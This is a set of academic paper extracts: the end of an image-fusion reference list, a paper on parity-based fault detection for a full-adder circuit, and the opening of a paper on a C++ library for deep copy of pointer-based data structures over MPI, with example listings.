shearlet coefficients. Information Fusion 19:20–28 DOI 10.1016/j.inffus.2012.03.002. Wertheim AH. 2010. Visual conspicuity: a new simple standard, its reliability, validity and applicability. Ergonomics 53(3):421–442 DOI 10.1080/00140130903483705. Xue Z, Blum RS. 2003. Concealed weapon detection using color image fusion. In: Sixth international conference on information fusion (FUSION2003). Piscataway: IEEE, 622–627. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 25/26 https://peerj.com http://dx.doi.org/10.1016/j.patcog.2007.06.022 http://dx.doi.org/10.1115/1.3066801 http://dx.doi.org/10.1016/0167-8655(89)90004-4 http://dx.doi.org/10.1016/0167-8655(89)90003-2 http://dx.doi.org/10.1109/TPAMI.2011.53 http://dx.doi.org/10.6084/m9.figshare.1008029 http://dx.doi.org/10.1016/S0141-9382(97)00014-0 http://dx.doi.org/10.1117/12.7977034 http://dx.doi.org/10.1109/97.995823 http://dx.doi.org/10.1109/TIP.2003.819861 http://dx.doi.org/10.1016/j.inffus.2012.03.002 http://dx.doi.org/10.1080/00140130903483705 http://dx.doi.org/10.7717/peerj-cs.80 Xue Z, Blum RS, Li Y. 2002. Fusion of visual and IR images for concealed weapon detection. In: Fifth international conference on information fusion, Vol. 2. Piscataway: IEEE, 1198–1205. Yajie W, Mowu L. 2009. Image fusion based concealed weapon detection. In: Inter- national conference on computational intelligence and software engineering 2009 (CiSE2009). Piscataway: IEEE, 1–4. Yang W, Liu J-R. 2013. Research and development of medical image fusion. In: 2013 IEEE international conference on medical imaging physics and engineering (ICMIPE). Piscataway: IEEE, 307–309. Yang S, Wang M, Jiao L, Wu R, Wang Z. 2010. Image fusion based on a new contourlet packet. Information Fusion 11(2):78–84 DOI 10.1016/j.inffus.2009.05.001. Yong J, Minghui W. 2014. Image fusion using multiscale edge-preserving decompo- sition based on weighted least squares filter. IET Image Processing 8(3):183–190 DOI 10.1049/iet-ipr.2013.0429. Zhang B, Lu X, Pei H, Zhao Y. 2015. A fusion algorithm for infrared and visible images based on saliency analysis and non-subsampled Shearlet transform. Infrared Physics & Technology 73:286–297 DOI 10.1016/j.infrared.2015.10.004. Zhang Q, Shen X, Xu L, Jia J. 2014. Rolling guidance filter. In: Fleet D, Pajdla T, Schiele B, Tuytelaars T, eds. 13th European conference on computer vision (ECCV2014), Vol. III. Berlin Heidelberg: Springer International Publishing, 815–830. Zhao J, Feng H, Xu Z, Li Q, Liu T. 2013. Detail enhanced multi-source fusion using visual weight map extraction based on multi scale edge preserving decomposition. Optics Communications 287:45–52 DOI 10.1016/j.optcom.2012.08.070. Zhu Z, Huang TS. 2007. Multimodal surveillance: sensors, algorithms and systems. Norwood: Artech House Publishers. Zitová B, Beneš M, Blažek J. 2011. Image fusion for art analysis. In: Computer vision and image analysis of art II, Vol. SPIE-7869. Bellingham: The International Society for Optical Engineering, 7869081–7869089. Zou X, Bhanu B. 2005. Tracking humans using multi-modal fusion. In: 2nd joint IEEE international workshop on object tracking and classification in and beyond the visible spectrum (OTCBVS’05). Piscataway: IEEE, W01-30-01-08. Toet (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.80 26/26 https://peerj.com http://dx.doi.org/10.1016/j.inffus.2009.05.001 http://dx.doi.org/10.1049/iet-ipr.2013.0429 http://dx.doi.org/10.1016/j.infrared.2015.10.004 http://dx.doi.org/10.1016/j.optcom.2012.08.070 http://dx.doi.org/10.7717/peerj-cs.80 work_zukr6fkh3zbxdcgipfzstjjrqu ---- A Fault Detection Method for Combinational Circuits AliAbbassZoraghchian 1 , Moslem Didehban 2 , MohammadReza Mehrabian 3 1.Department of computer Engineering AllameMohaddesNoori institute of Higher Education Mazandaran, Iran, Zaliabbass@yahoo.com 2.Department of Computer Engineering and Information Technology Amirkabir University of Technology, Tehran, Iran, m_didehban@aut.ac.ir 3.Department of Computer Engineering and Information Technology Amirkabir University of Technology, Tehran, Iran, mhrb78@aut.ac.ir Abstract. As transistors become increasingly smaller and faster and noise margins become tighter, circuits and chip specially microprocessors tend to become more vulnerable to permanent and transient hardware faults. Most microprocessor designers focus on protecting memory elements among other parts of microprocessors against hardware faults through adding redundant error-correcting bits such as parity bits. How ever, the rate of soft errors in combinational parts of microprocessors is consider edas important as in sequential parts such as memory elements nowadays. The reason is that advances in scaling technology have led to reduced electrical masking .This paper proposes and evaluates a logic level fault-tolerant method based on parity for designing combinational circuits. Experimental results on a full adder circuit show that the proposed method makes the circuit fault- tolerant with less overhead in comparison with traditional methods. It will also be demonstrated that our proposed method enables the traditional TMR method to detect multiple faults in addition to single fault masking. Keywords: Soft Error, Transient Fault, Fault-Tolerance, Combinational Circuits, Full Adder. 1. Introduction As the transistor dimensions have shrunk and the large-scale integration in electronic switches has increased, chip fabricators can insert more than one billion transistors in a single chip. Such integration scale can increase the performance of chips. Many of new architecture techniques, such as Superscalar and Chip-Multi Processor (CMP), actually need such number of transistors. However, the ever-increasing nonlinear power consumption in the technology trend could be a disaster for circuits, because the transistor density is going up intensely. To prevent this problem we should decrease the voltage supply, and this change can lead to falling the noise margin in the circuit [1]. On the other hand, by shrinking the feature size, the factor QCritical (electrical charge of capacitances) is decreased too, and this problem can lead to increase the probability of fault occurrence in the circuit [2]. It is proved that large- scale circuit integration increases the failure rate exponentially [3].Generally, in new generation technologies, we have less reliability than the old ones. Some of the reasons for these problem sare: lower CL (load capacitance), lower VDD or VCC (supply voltage)that lead toa smaller noise margin, lower QCritical, more process variation [4] and manufacturing defects[5]. These factors affect the reliability, that is a key concept along with performance and power metrics, and needs to use a fault-tolerance mechanism [3, 6, 7].Typically, all components of chip scan be classified in to two categories, Logic Block sand Memory Elements. Commercial microprocessors typically use Error Correction Codes (ECCs) to protect these circuit elements. ECCs, such as parity, add latency to each access and results in an appreciable performance penalty, moreover, it is difficult to implement for logic blocks [8,9].However, combinational circuits are very importance for fault-tolerant design. Because new technologies are facing less degree of electrical masking and this phenomenon makes circuits more susceptible to faults [10]. In [3] it has been mentioned that from the year 2011on importance of improving fault coverage in combinational circuits will overcome the sequential ones. For this reason, we decided to choose this area for the implementation of our technique. Fault-tolerance techniques are generally accomplished by using redundancy in hardware, software, time and information [11]. In this paper, we have used hardware redundancy in combinational circuits. Some of the fault-tolerant hardware methods are Duplication With Comparison (DWC)in which the module is duplicated, result sare compared and if one mismatch occurs, an error flag is raised.N-Modular Redundancy (NMR) design techniques add reliability to a system at the expense of extra hardware resources. In an NMR system, all protected modules must be replicated N times, in order to allow for automatic masking of N/2 of faults happening in separate modules.Standard Triple-Module Redundancy (TMR) methods are used frequently. Using these methods, triple modules and voting circuits are implemented onto an Application Specific Integrated Circuit (ASIC) or a Field-Programmable Gate Array (FPGA). When a fault occurs, the voting circuit neglects the value of a faulty module and takes a correct value of the other two non-faulty modules. These methods come with high area and power dissipation penalties and are inherently proposed for detecting or masking a single fault [11].This paper is organized as follows: section 2 presents a brief background of fault sensitivity in combinational and sequential circuits ;in section 3 we proposed a new fault- tolerance technique in combinational circuits;in section 4we apply this method to full adder circuit; and finally, in section 5concluded. 2. Background Single event transient pulse is induced when cosmic particles such as Neutron Strikes, or radiation from packaging materials such as alpha Particle with enough energy hit the sensitive region in the circuit [10]. The voltage pulse propagates through an activated path in the logic circuit. When itis captured by a clock edge, a soft error occurs. Otherwise, that pulse is called a transient fault [12].In recent years, with advance in the technology of fabrication, transistor quantities, processors are becoming increasingly vulnerable to transient faults [13].Transient faults currently account for over 80% of faults in processor-based devices [14].In a typical integrated circuit, memory arrays, latch elements, and combinational logic are the most sensitive parts and could be affected by soft errors and transient faults. Historically, soft errors were a concern in the design of memory elements, but the susceptibility of the combinational blocks to transient faults increases as a side effect of technological scaling. Combinational logics are usually used for designing arithmetic circuits (such as adders, multipliers, etc) or in other words the data path of a computer. We should know the importance of employing combinational circuits in applicable chips processing is rising, as they are simpler, operate faster, and consume less power than sequential ones. Moreover, many of statistical researches proved this statement [15, 16].Combinational circuits occupy a considerable portion of processing chips in comparison with sequential circuits. For example in FPGAs,The ratio of using combinational circuits to sequential ones varies between 5 to 100 times [17,18].Fig.1: Overall new approach framework Continuous device scaling,higher degree of pipeliningand decreasing electrical masking effect, contribute to the increase in soft error rates in combinational circuits [10].Transient faults in combinational circuits are catching up with errors in memory elements [3]. A transient fault in a logic circuit might not be captured in a memory circuit, because it could be masked by one of the following three phenomena [3,19,20]:First, Logical Masking, occurs when a particle strikes a portion of the combinational logic that is blocked from affecting the output due to a subsequent gate whose result is completely determined by other input values.Second, Electrical Masking, occurs when the pulse resulting from a particle strike is attenuated by subsequent logic gates due to the electrical properties ofthe gates to the point that it does not affect the result of the circuit.Third, Latching-Window Masking,occurs when the pulse resulting from a particle strike reaches a latch, but not at the clock transition where the latch captures its input value. These masking effects have been found to result in a significantly lower rate of soft errors in combinational logic compared to storage circuits in equivalent device technology [3]. However, these effects could diminish significantly as feature sizes decrease and the number of stages inthe processor pipeline increases. Electrical masking could be reduced by device scaling because smaller transistors are faster and hence may have less attenuation effect on a pulse. Also, deeper processor pipelines allow higher clock rates, meaning the latches in the processor will cycle more frequently, which may reduce latching-window masking. Hence, in this work we focus on occurrence of transient faults and soft errors in combinational logic circuits and suggest a logic level fault-tolerant design method. 3. New Approach Framework In this paper we presented a new approach to design fault-tolerant combinational circuits. Assume a logic circuit with m-input and n-output lines. Each output is a logic function of inputs. In this method, we use hardware redundancy to add a redundant output signal to the circuit. This new output generates the parity bit for output set. The value of redundant output is directly derived from the input lines.There are two main types of parity checking in digital systems, Odd Parity (Po) and Even Parity(Pe). Both of these types can be used in our scheme. Because parity checking mechanism is a relative method and it is sufficient that both sides be aware of the convention of data communication [21].If we model the input/output sides of a logic circuit by the sender/transmitter stations in a telecommunication system, we can say that parity checking is a conventional method to check the bit errors in the telecommunication systems. In this technique, the transmitter station tries to send an extra bit accompanied by transmission data bits,in order to detect single bit errors that may occur on the channel after getting data by the receiver station. In our scheme, first we calculated the truth table of the redundant output line as an even/odd parity for output lines. Then, try to make it related to the input bit arrangements.After finding the function role and simplifying it, we can plot by the least needed logic gates. It is important that we should not use the middle terms of the main circuit to design this redundant line. If middle term are used, faults occurring before these branches would not appear on the output (i.e. the redundant parity signal).If we assume using the even parity mechanism for designing the redundant output line, XORing this line with the other main circuit outputs can demonstrate the error occurrence. We name the result of this XOR gate as the ERROR signal. Seeing zero in this line means that no error has occurred, and seeing one can refer to an error in a part of the circuit. It is clear that by using the odd parity checking mechanism XOR gate converts to XNOR gate, but the outline of overall method remains as before. The framework of this scheme has been shown in Fig. 1. TMR method is a conventional technique to design fault-tolerant circuits. This technique can mask a single fault by voting results. But, if multiple faults occur in the modules, this method is unable to mask or detect them. As a result, incorrect outputs are voted and an error is appeared as the result of the circuit. Hence, TMR treats weakly when facing multiple faults. Replacing our proposal module with conventional TMR modules can help to detect multiple faults by voting ERROR signals in addition to the other output lines.It worth emphasize that our proposed approach is capable to detect all single faults that may occur in the logic circuit, whether they lie in the main part of circuit or not. Fig.1: Overall new approach framework 4. A Case Study ALUs are very important combinational circuit block that lie on the computational data path in the processors. The reason for their importance can be related being on the critical path. Typically, a key point of delay propagation in the processors is the maximum length of path between source registers and destination ones[22]. This length is depended upon the number of ALU functional units (FUs) that are lied on this computational path. Critical path on the processors should be designed as a fault tolerance path in order to increase reliability. A. Designing Fault-Detection Full Adder (FDFA) Figure2.Gate-level FDFA A To show the effects of our approach in practice, we used a FDFA an applicable logic circuit in the ALUs. FA is a simple logic circuit that is used as a basic element to design many of functional units, such as adders, subtracters, multipliers, dividers, etc. All circuits in our experiments are custom designed and laid out in 1.8V, 0.5µmCMOStechnology and simulated by using HSPICEtool. This circuit uses a redundant part to provide an even parity for outputs SUM and COUT, which is named E. Eis a logic function of FA input lines, named A, B and CIN. The value of this output line is selected in a way that the number of 1 bits in three output lines, always be even.TABLE I shows the truth table of FDFA. TABLE I: Truth table of FDFA A B CIN SUM COUT E 0 0 0 0 0 0 0 0 1 1 0 1 0 1 0 1 0 1 0 1 1 0 1 1 1 0 0 1 0 1 1 0 1 0 1 1 1 1 0 0 1 1 1 1 1 1 1 0 CINBACINBACINBACINBAE .........  (1) After deriving the value of E line for all input arranges, the equation (1) simply is resulted. This equation shows that in order to implement E line, three NANDs and three NOTs are totally needed. In the next stage, we try to design this circuit by above gates. The derived gate-level design of FDFA has shown in Fig. 2. After it, we sketch the layout of this circuit in the L-Edit tool and get the waveforms of FDFA operation with giving some experimental inputs. Fig. 3 shows these waveforms for all of input and output lines. B. Implementation Results We demonstrated the hardware and timing overheads of using FDFA in comparison with the NFA. Next, with adding a XOR gate into the FDFA(as XFDFA), the calculated overheads compared with the DWC method with NFA modules. TABLE II shows area, propagation delay and dynamic power consumption overheads. The area overhead is about 27% that is the result of 12 additional transistors in FDFA design. About propagation delay, that is a very important factor to evaluate circuit specifications, both of schemes are similar.Because worst-case delay is limited by path of generating SUM signal.In TABLE III,we compared XFDFA with DWC Figure 2.Gate-level FDFA because both of them are capable to detect a single fault. Figure3. FDFA waveforms TABLE II: NFA vs. FDFA Metric Method Area Dela y Power (fwT) Layout Area # of Transistor s NFA 204*58 λ 2 38 54τ 2.68 FDFA 254*58 λ 2 50 54τ 3.86 Overhead 24% 31% 0% 44% TABLE III: DWC vs.XFDFA Metric Method Area Delay Power (fwT) Layout Area # of Transisto rs DWC 339*215 λ 2 92 131.2 τ 6.387 XFDFA 311*128 λ 2 64 179.8 τ 4.981 Improvem ent 45% 30% -27% 22% In order to implement DWC, we use two coupled NFAs with XORed similar outputs together to check results. Our XFDFA is designed with 28 transistors less than DWC and almost can save 28% in dynamic power consumption. Because the redundant component in DWC is greater than XFDFA.But, in delay we are penalized about 37%. The reason of this penalty is using a two level XOR in the final stage of XFDFA.If we verify the arrangement of gates in each circuit by using logic level viewing, find out that both of these methods use a 2-level combinational circuit in their output side, but the last gate in DWC (an OR gate) is quicker than the end gate of XFDFA (a XOR gate). 5. Conclusions In this paper, we proposed a new approach to design fault-tolerant combinational circuits. The main idea behind our proposed approach is using a redundant circuit that operates as an even parity generator for main output lines. We also showed that traditional methods such as TMR detect multiple faults in addition to single faults if they are combined with the proposed method. Experimental results obtained from testing the proposed approach on a full adder circuit exhibit about 27.5%overhead in area and 44% penalty in power consumption, which shows about 37.5% improvement in area and 22% in power over the traditional DWC method. This method shows to perform almost equal to DWC from propagation delay point of view. References [1] J. Srinivasan, S. V. Adve, P. Bose, and J. A. Rivers, "The impact of technology scaling on lifetime reliability," presented at the INT. Conf. Dependable Systems and Networks, June 2004. [2] K. Mohanram, and N. A. Touba, "Cost-Effective Approach for Reducing Soft Error Failure Rate in Logic Circuits," presented at the ITC. Conf. International Test Conference, 2003, pp. 893. [3] P. Shivakumar, M. Kistler, S. W. Keckler, D. Burger, and L. Alvisi, "Modeling the effect of technology trends on the soft error rate of combinational logic," presented at the DSN. Conf. Proceedings of International Conference on Dependable Systems and Networks, June 2002, p. 389–98. [4] S. Borkar, T. Karnik, S. Narendra, J. Tschanz, A. Keshavarzi, and D. Vivek, "Parameter variations and impact on circuits and microarchitecture," presented at the Conf. Design Automation, June 2003. [5] K. Constantinides, S. Plaza, J. Blome, B. Zhang, V. Bertacco, S. Mahlke, T. Austin, and M. Orshansky, "Bulletproof: A defect-tolerant CMP switch architecture," presented at the INT. Conf. Symposium on High Performance Computer Architecture, February 2006. [6] V. Narayanan, and Y. Xie, "Reliability concerns in embedded system designs," presented at the Conf. IEEE Computer Society, Jan 2006, 39(1):118–20. [7] D. T. Franco, J. F. Naviner, and L. Naviner, "Yield and reliability issues in nanoelectronic technologies," presented at the ANN. Conf. Telecommunication, 2006, 61(11–12):1422–57. [8] J. F. Zielger, and H. Puchner, "SER-History, Trends and Challenges," presented at the Conf. Cypress Semiconductor Corporation, 2004. [9] V. Stojanovic, "A Cost-Effective Implementation of an ECC-Protected Instruction Queue for Out-of-Order Microprocessors," presented at the DAC. Conf., 2006. [10] S. Mukherajee, "Architectural Design for Soft Errors," in Morgan Kaufmann Publishers, 2008. [11] B. Johnson, "Design and Analysis of Fault-Tolerant Digital Systems," in Addison Wesley Reading MA, 1989. [12] J. A. Blome, S. Gupta, S. Feng, and S. Mahlke, “Cost-efficient soft error protection for embedded microprocessors,” in CASES, 2006, pp. 421–31. [13] S. Mukherjee, J. Emer, and S. Reinhardt, “The Soft-Error Problem: An Architectural Perspective,” presented at the HPCA-11 Conf. 11th INT. Symp. High Performance Computer Architecture, 2005. [14] R. K. Dyeriyer, and D. J. Rossetti, "A Measurement-Bascd Model for Workload Dependence of CPU Errors," presented at the IEEE Trans. Comp., vol. C-35, pp. 511-19, June 1986. [15] Z. A. Obaid, N. Sulaiman, and M. N. Hamidon, "Developed Method of FPGA-based Fuzzy Logic Controller Design with the Aid of Conventional PID Algorithm," presented at the Australian Journal of Basic and Applied Sciences, 2009, 3(3):2724-40. [16] K. Perkuszewski, K. T. Pozniak, W. Jalmuna, W. Koprek, J. Szewinski, and R. S. Romaniuk, "FPGA based Multichannel Optical Concenrator SIMCON 4.0," presented at the TESLA cavities LLRF Control System, Deutsche Elektronen-Synchrotron (DESY), Germany, 2007. [17] T. Siriwan, and P. Nilagupta, "HPGAST: High Performance GA-based Sequential circuits Test generation on Beowulf PC-Cluster," presented at the Conf. Pahonyothin Rd. Lardyao Jatujak Bangkok 10900 Thailand, 2002. [18] F. Kocan, and D. G. Saab, "Dynamic Fault Diagnosis of Combinational and Sequential Circuits on Reconfigurable Hardware," presented at the Journal of Electron Test, Springer Science, September 2007, 23:405–20. [19] M. P. Baze, and S. P. Buchner, “Attenuation of Single Event Induced Pulses in CMOS Combinational Logic,” presented at the IEEE Trans. on Nuclear Science, Vol. 44, No. 6, pp. 2217–22, December 1997. [20] P. Liden, P. Dahlgren, R. Johansson, and J. Karlsson, “On Latching Probability of Particle Induced Transient in Combinatorial Networks,” presented at the 24th Symposium on Fault-Tolerant Computing (FTCS), pp. 340–49, June 1994. [21] M. D. Chinn, "Survey Based Expectations and Uncovered Interest Rate Parity," University of Wisconsin, Madison and NBER, October 2009. [22] A. Saberkari, A. Afzalikosha, and S. B. Shokouhi, “A new low voltage and low power CMOS one bit full-adder using GDI technique,”presented at the 14th Iranian Conference on Electrical Engineering (ICEE), Amirkabir University, Tehran, Iran, May 2006. work_ztklkdhf5fexjdonz6dgaysziq ---- Implementing generalized deep-copy in MPI Implementing generalized deep-copy in MPI Joss Whittle1 ,*, Rita Borgo2,* and Mark W. Jones1,* 1 Department of Computer Science, Swansea University, Swansea, United Kingdom 2 Informatics Department, King’s College London, London, United Kingdom * These authors contributed equally to this work. ABSTRACT In this paper, we introduce a framework for implementing deep copy on top of MPI. The process is initiated by passing just the root object of the dynamic data structure. Our framework takes care of all pointer traversal, communication, copying and reconstruction on receiving nodes. The benefit of our approach is that MPI users can deep copy complex dynamic data structures without the need to write bespoke communication or serialize/deserialize methods for each object. These methods can present a challenging implementation problem that can quickly become unwieldy to maintain when working with complex structured data. This paper demonstrates our generic implementation, which encapsulates both approaches. We analyze the approach with a variety of structures (trees, graphs (including complete graphs) and rings) and demonstrate that it performs comparably to hand written implementations, using a vastly simplified programming interface. We make the source code available completely as a convenient header file. Subjects Computer Networks and Communications, Distributed and Parallel Computing, Programming Languages Keywords MPI extension library, Deep copy, Serialization, Marshalling, Dynamic data structures, Deserialization, Unmarshalling INTRODUCTION Message passing is an established communication paradigm for both synchronous and asynchronous communication in distributed or parallel systems. Using MPI with object orientation is not always an easy task, while control on memory locality and data distribution represent extremely valuable features, dealing with the ever growing and sophisticated features of OO languages can be cumbersome. This problem is particularly challenging for data structures employing abstractions (e.g., inheritance and polymorphism) and pointer indirection, since transferring these data structures between disjoint hosts requires deep copy semantics. For user defined objects MPI adopts shallow copy semantics, whereby default copy constructors and assignment operators perform shallow copies of the object leaving memory allocation, copy, and de-allocation to be the responsibility of the programmer, not the implementation. A similar policy is applied to MPI objects, represented as handles to opaque data that cannot be directly copied. Copy constructors and assignment operators in user defined objects that contain an MPI handle must either ensure to invoke the appropriate MPI function to copy the opaque data (deep copy) or use a reference counting scheme that will provide references to the handle (reference counted shallow How to cite this article Whittle et al. (2016), Implementing generalized deep-copy in MPI. PeerJ Comput. Sci. 2:e95; DOI 10.7717/ peerj-cs.95 Submitted 6 July 2016 Accepted 4 October 2016 Published 21 November 2016 Corresponding author Mark W. Jones, m.w.jones@swansea.ac.uk Academic editor Srikumar Venugopal Additional Information and Declarations can be found on page 57 DOI 10.7717/peerj-cs.95 Copyright 2016 Whittle et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.95 http://dx.doi.org/10.7717/peerj-cs.95 mailto:m.�w.�jones@�swansea.�ac.�uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.95 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ copy). Shallow copy is acceptable for shared-memory programming models where it is always legal to dereference a pointer with the underlying assumption that the target of member pointers will be shared among all copies. Users often require deep copy semantics, as illustrated in Fig. 1, where every object in a data structure is transferred. Deep copy requires recursively traversing pointer members in a data structure, transferring all disjoint memory locations, and translating the pointers to refer to the appropriate device location also referred to as object serialization or marshalling, commonly used for sending complex data structures across networks or writing to disk. MPI has basic support for describing the layout of user defined data types and sending user-defined objects between processes (Message Passing Interface Forum, 2014). The directives we propose provide a mechanism to shape and abstract deep copy semantics for MPI programs written in C++. Along with elegantly solving the deep copy problem, this mechanism also reduces the level of difficulty for the programmer who only needs to express the dependencies of an object type, rather than explicitly programming how and when to move the memory behind pointers. As a motivating example, we show that comparable performance can be achieved when using a simple and generic algorithm to implement deep copy compared to hand coded native MPI implementations. The main contributions of this work are: � We introduce the MPI Extension Library (MEL), a C++ header-only wrapper around the MPI standard which aims to give a simplified programming interface with Figure 1 An example of a structure that requires deep copy semantics. Arrows represent pointer traversals to disjoint regions of memory. Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 2/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ consistent type-safety and compile time error handling, along with providing efficient implementations of higher level parallel constructs such as deep copy. � As a part of MEL, we provide generic implementations of deep copy semantics that can be easily applied to existing code to enable complex structured data to be deep copied transparently as either a send, receive, broadcast, or file access operation with minimal programmer intervention. The latter can also be used for the purpose of check-pointing when writing fault tolerant MPI code. RELATED WORK Message passing as a style of parallel programming enables easy abstraction and code composition of complex inter-process communications. Existing MPI interfacing libraries (McCandless, Squyres & Lumsdaine, 1996; Huang et al., 2006; Boost-Community, 2015) by default rely on the underlying standard shallow copy principle, where data contains no dependencies of memory outside the region directly being copied; and that where dependencies do exist that they are explicitly resolved by the programmer using subsequent shallow copies. However, this simplified model of communication comes at the cost of having to structure computations that require inter-process communication using low-level building blocks, which often leads to complex and verbose implementations (Friedley et al., 2013). Similar systems, such as the generic message passing framework (Lee & Lumsdaine, 2003) resolve pointers to objects, but do not follow dynamic pointers (data structure traversal) to copy complete complex dynamic structures possibly containing cycles. MPI works on the principle that nothing is shared between processes unless it is explicitly transported by the programmer. These semantics simplify reasoning about the program’s state (Hoefler & Snir, 2011) and avoid complex problems that are often encountered in shared-memory programming models (Lee, 2006) where automatic memory synchronization becomes a significant bottleneck. Autolink and Automap (Goujon et al., 1998) work together to provide similar functionality. Automap creates objects at the receiver. Autolink tags pointers to determine whether they have been visited or not during traversal. The user must place directives in their code and carry out an additional compilation step to create intermediate files for further compilation. Extended MPICC (Renault, 2007) is a C library that converts user-defined data types to MPI data types, and also requires an additional compilation. It can automate the process, but also in some cases requires user input to direct the process. Tansey & Tilevich (2008) also demonstrate a method to derive MPI data types and capture user interaction via a GUI to direct the marshalling process. Autoserial Library (GNA, 2008) gives a C++ interface for performing serialization to file as binary or XML; or to a raw network socket as binary data. Their library also offers a set of convenience functions for buffering data to a contiguous array with MPI communications to move the data. Their method makes extensive use of pre-processor macros to generate boilerplate code needed for deep traversal of objects. For MPI, this Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 3/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ library only handles the use case of fully buffered deep copy in the context of MPI_Send and MPI_Recv communications. OpenACC (Beyer, Oehmke & Sandoval, 2014) tackles the deep copy problem in the context of transferring structured data from host machines to on node hardware such as GPUs and Accelerators. Their approach is based on a compiler implemented #pragma notation similar to OpenMP while our method is implemented as a header only template library. TPO++ (Grundmann, Ritt & Rosenstiel, 2000) requires serialize and deserialize functions to be defined. The paper highlights good design goals which we also follow in this work. Compared to the above approaches, we place much lighter requirements on the user and do not require additional signposting (usually implemented as preprocessor macros wrapped around variable declarations) that other methods require. We do not require an additional compilation step or GUI compared to the above as will be demonstrated in the following sections. We also provide an analysis of our approach. We explicitly demonstrate and analyze our approach on a wide variety of complex dynamic data structures. Our analysis shows that our approach has low time and memory overhead and also requires less user direction to achieve deep copy. It provides this extra functionality at no loss of performance over hand coded approaches. We avoid the in place serialize that some approaches utilize, resulting in our approach having a low memory overhead. We also evaluate our methods in comparison to Boost Serialization Library (Cogswell, 2005) and demonstrate that Boost introduces a performance penalty which our method avoids. Boost also requires more intervention from the user/programmer to achieve the same capability. Therefore, the main benefit of our approach over others is that it is a true deep copy approach where the user only has to pass in the root object/node of the data structure. In CHARM++ (Kale & Krishnan, 1993; Miller, 2015) messages are by default passed by value, however CHARM++ provides support for deep copy via definition of serialization methods for non-contiguous data structures. It is a user task to define the proper serialization methods including the explicit definition of memory movement and copy operations. If the serialization methods are implemented correctly for a user-defined type, a deep copy will be made of the data being serialized. CHARM++ distinguishes between shared-memory and distributed-memory scenarios, where shared-memory data within a node can be directly passed by pointer. The programmer must explicitly specify the policy to be adopted by indicating if the data should be conditionally packed or not. Conditionally packed data are put into a message only when the data leaves the node. In an MPI environment processes within the same node do not share a common address space making such an optimization unavailable. Generally the more desirable solution is to avoid deep copy operations to maintain efficiency in message transmission. This is straightforward to achieve by converting user- defined types with pointer members to equivalent user-defined types with statically-sized arrays. This approach of restructuring and packing a data structure is often used by shared-memory programming paradigms where structures with pointers are manually Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 4/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ packed and unpacked across the device boundary to reduce transfer costs for data structures used on the device. When memory isolation (e.g., avoid cross boundary references) is not a requirement other approaches might be possible. For operations executed within sequential or shared memory multi-core processors, hardware can be used more efficiently by avoiding deep copy operations and rely instead on pointer exchange. This requires messages to have an ownership transfer semantics with calls to send (pass) ownership of memory regions, instead of their contents, between processes (Friedley et al., 2013). In the context of the present work, we do not focus on ownership passing but on the traditional approach of refactoring code. MEL provides an efficient and intuitive alternative to implementing object packing by hand. Porting an object type to use MEL deep copy only requires adding a member function to the type containing directives that describe the dependencies of the type. In this case, the additional effort to rewrite data structures to allow communication using the standard MPI shallow copy principles is much larger, making refactoring an application to avoid deep copy an undesirable solution. Deep copy semantics are not only relevant when dealing with inter-process communication. When recovering from process or node failure in fault tolerant MPI, applications often incur problems very similar to the ones dealt by deep copy operations. Fault tolerance plays an important role in high performance computing applications (Herault & Robert, 2015) and significant research has focused on its development in MPI (Gropp & Lusk, 2004; Vishnu et al., 2010; Bouteiller, 2015). While the library itself does not provide explicit fault-tolerance support, MPI can provide a standard and well- structured context for writing programs that exhibit significant degrees of fault tolerant behavior. Several approaches have been investigated in literature to achieve fault tolerance in MPI (Gropp & Lusk, 2004; Laguna et al., 2014), with check-pointing being one of the most commonly used compared to more sophisticated approaches involving direct manipulation of the MPI standard to support fault tolerance (Fagg, Bukovsky & Dongarra, 2001; Fagg & Dongarra, 2004), or modifying semantics of standard MPI functions to provide resilience to program faults. In check-pointing, a process will periodically cache its work to disk so that in the event of a crash or node failure, a newly spawned process can load back the last saved state of the failed process and continue the work from there. When the data a process is dependent on is deep in structure, the implementation challenges associated with reading and writing the data to disk are the same ones encountered when handling the communication of such types. MEL provides support for fault-tolerance by leveraging deep copy semantics to transparently target file reads and writes in the same manner it handles the sending and receiving of inter-process communications. WHEN TO USE DEEP COPY It is important that programmers be aware of the dangers of shallow-copying deep types without also resolving any dependencies of that type. For example, if an object contains a pointer and is copied by its memory footprint to another MPI process the value of the contained pointer on the receiver is now dangling and accessing the pointed to Whittle et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.95 5/59 http://dx.doi.org/10.7717/peerj-cs.95 https://peerj.com/computer-science/ memory erroneous. Listing 1 shows an example of performing such an MPI shallow-copy when a deep copy was needed. Listing 1 User example–error from not resolving the data dependencies of an object when copying with MPI. 1 struct SomeStruct { 2 int *ptr = nullptr, len = 0; 3 }; 4 5 //---------------------------------------------------// 6 // On sending process 7 SomeStruct myVar; 8 9 // Allocate sub array 10 myVar.len = 10; 11 MPI_Alloc_mem(myVar.len * sizeof(int), MPI_INFO_NULL, &(myVar. ptr)); 12 13 // Populate sub array with values... 14 15 MPI_Send(&myVar, sizeof(SomeStruct), MPI_BYTE, dst_rank, tag, comm); 16 17 //---------------------------------------------------// 18 // On receiving process 19 SomeStruct myVar; 20 MPI_Recv(&myVar, sizeof(SomeStruct), MPI_BYTE, src_rank, tag, comm); 21 22 // Error! myVar.ptr is now a dangling reference to the memory of the sending process! While accessing the pointed to memory is invalid, if we declare as a rule that if a pointer is not allocated it will be assigned to nullptr (and we strictly adhere to this rule), we can use the value of the dangling pointer to determine if an allocation needs to be made and data received on the receiving process. Listing 2 gives a corrected example of Listing 1, by deep copying a struct containing a pointer safely using native MPI commands. Listing 2 User example–hand coded deep copy using a dangling pointer from the sending process to determine if data needs to be received. 1 struct SomeStruct { 2 int *ptr = nullptr, len = 0; Whittle et al. 